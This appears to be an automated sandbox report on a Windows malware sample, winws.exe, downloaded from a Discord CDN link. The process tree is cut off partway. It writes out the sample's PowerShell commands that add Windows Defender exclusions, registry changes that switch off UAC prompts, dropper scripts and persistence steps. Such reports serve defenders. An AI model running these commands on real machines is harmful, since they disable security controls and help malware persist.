pid Process 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 4656 msedge.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe 5348 taskmgr.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 4776 winws.exe 232 javaw.exe 5796 winws.exe 5824 javaw.exe 5268 WinHelper32.exe 5912 javaw.exe 460 Boostrapper.exe 4776 WinHelper32.exe 6128 WinHelper32.exe 5868 Boostrapper.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4656 wrote to memory of 2872 4656 msedge.exe 84 PID 4656 wrote to memory of 2872 4656 msedge.exe 84 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3576 4656 msedge.exe 85 PID 4656 wrote to memory of 3252 4656 msedge.exe 86 PID 4656 wrote to memory of 3252 4656 msedge.exe 86 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 PID 4656 wrote to memory of 4532 4656 msedge.exe 87 -
System policy modification 1 TTPs 14 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" WinHelper32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0" WinHelper32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "0" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" WinHelper32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" WinHelper32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "0" WinHelper32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" xdwd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" WinHelper32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" WinHelper32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0" xdwd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1300886873148756050/1300960864043663533/winws.exe?ex=6722bdb8&is=67216c38&hm=6421a3d612c9b6c41279c7a97310aba4b86dbc69dc16a3bc8027d28cde7073e8&1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff877f846f8,0x7ff877f84708,0x7ff877f847182⤵PID:2872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:22⤵PID:3576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:82⤵PID:4532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:12⤵PID:3952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:12⤵PID:3956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 /prefetch:82⤵PID:3468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5436 /prefetch:82⤵PID:2192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:12⤵PID:4756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:12⤵PID:404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3416 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3920 /prefetch:82⤵PID:1956
-
-
C:\Users\Admin\Downloads\winws.exe"C:\Users\Admin\Downloads\winws.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4776 -
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\winws.exe"3⤵
- Drops startup file
- Suspicious use of SetWindowsHookEx
PID:232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5244
-
-
C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinHelper32.exeC:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinHelper32.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5268 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows\Defender\yjJlDaeiCtZ3rPY3voT8EfypAtNWVOHqwTO.vbe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5776 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows\Defender\zHxvwMPtXsd9EflNyF6bR38DTMh313hvK806W5p8W9mTT85g.bat" "6⤵
- System Location Discovery: System Language Discovery
PID:4940 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe"C:\Users\Admin\AppData\Roaming\Windows/Defender/RunShell.exe"7⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5204 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qlgu50dl\qlgu50dl.cmdline"8⤵
- Drops file in System32 directory
PID:5844 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD31.tmp" "c:\Windows\System32\CSCED94E796E85444428CB0B85CDF9B85C9.TMP"9⤵PID:5752
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\PackageManifests\xdwd.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\MSBuild\RuntimeBroker.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\RuntimeBroker.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\dllhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lLSWsfpTer.bat"8⤵PID:5576
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:5204
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:404
-
-
C:\Windows\ModemLogs\RuntimeBroker.exe"C:\Windows\ModemLogs\RuntimeBroker.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Windows\Defender\xdwd.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\xdwd.exe"5⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:5928 -
C:\Windows\SysWOW64\WindowsInput.exe"C:\Windows\SysWOW64\WindowsInput.exe" --install6⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4756
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5248
-
-
C:\Users\Admin\AppData\Roaming\Windows\Helper\WinHelper32.exe"C:\Users\Admin\AppData\Roaming\Windows\Helper\WinHelper32.exe"6⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:4776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5720
-
-
C:\Users\Admin\AppData\Roaming\WinHelperWatchdog.exe"C:\Users\Admin\AppData\Roaming\WinHelperWatchdog.exe" /launchSelfAndExit "C:\Users\Admin\AppData\Roaming\Windows\Helper\WinHelper32.exe" 4776 /protectFile7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1660 -
C:\Users\Admin\AppData\Roaming\WinHelperWatchdog.exe"C:\Users\Admin\AppData\Roaming\WinHelperWatchdog.exe" /watchProcess "C:\Users\Admin\AppData\Roaming\Windows\Helper\WinHelper32.exe" 4776 "/protectFile"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:460
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Windows\Defender\Boostrapper.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\Boostrapper.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:460 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\blockComAgentdll\l2A594olLEJWUEUfw4GfnauDbYxQl.vbe"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5320 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\blockComAgentdll\Q5HIcCBrM4kJ2gRS.bat" "7⤵
- System Location Discovery: System Language Discovery
PID:5812 -
C:\blockComAgentdll\hypercommonSvc.exe"C:\blockComAgentdll/hypercommonSvc.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1456 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rVXWMmV2xV.bat"9⤵PID:1540
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:5220
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:210⤵PID:4592
-
-
C:\Users\All Users\wininit.exe"C:\Users\All Users\wininit.exe"10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3312
-
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:12⤵PID:5408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:12⤵PID:5248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:12⤵PID:5464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3934533091346255582,11221886224182127438,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:12⤵PID:6088
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1472
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4884
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5664
-
C:\Users\Admin\Downloads\winws.exe"C:\Users\Admin\Downloads\winws.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5796 -
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\winws.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:5824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5992
-
-
-
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\winws.exe"2⤵
- Drops startup file
- Suspicious use of SetWindowsHookEx
PID:5912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6136
-
-
C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinHelper32.exeC:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinHelper32.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6128 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows\Defender\yjJlDaeiCtZ3rPY3voT8EfypAtNWVOHqwTO.vbe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5336 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows\Defender\zHxvwMPtXsd9EflNyF6bR38DTMh313hvK806W5p8W9mTT85g.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:5608 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe"C:\Users\Admin\AppData\Roaming\Windows/Defender/RunShell.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:404
-
-
-
-
C:\Users\Admin\AppData\Roaming\Windows\Defender\xdwd.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\xdwd.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5540
-
-
C:\Users\Admin\AppData\Roaming\Windows\Defender\Boostrapper.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\Boostrapper.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5868 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\blockComAgentdll\l2A594olLEJWUEUfw4GfnauDbYxQl.vbe"5⤵
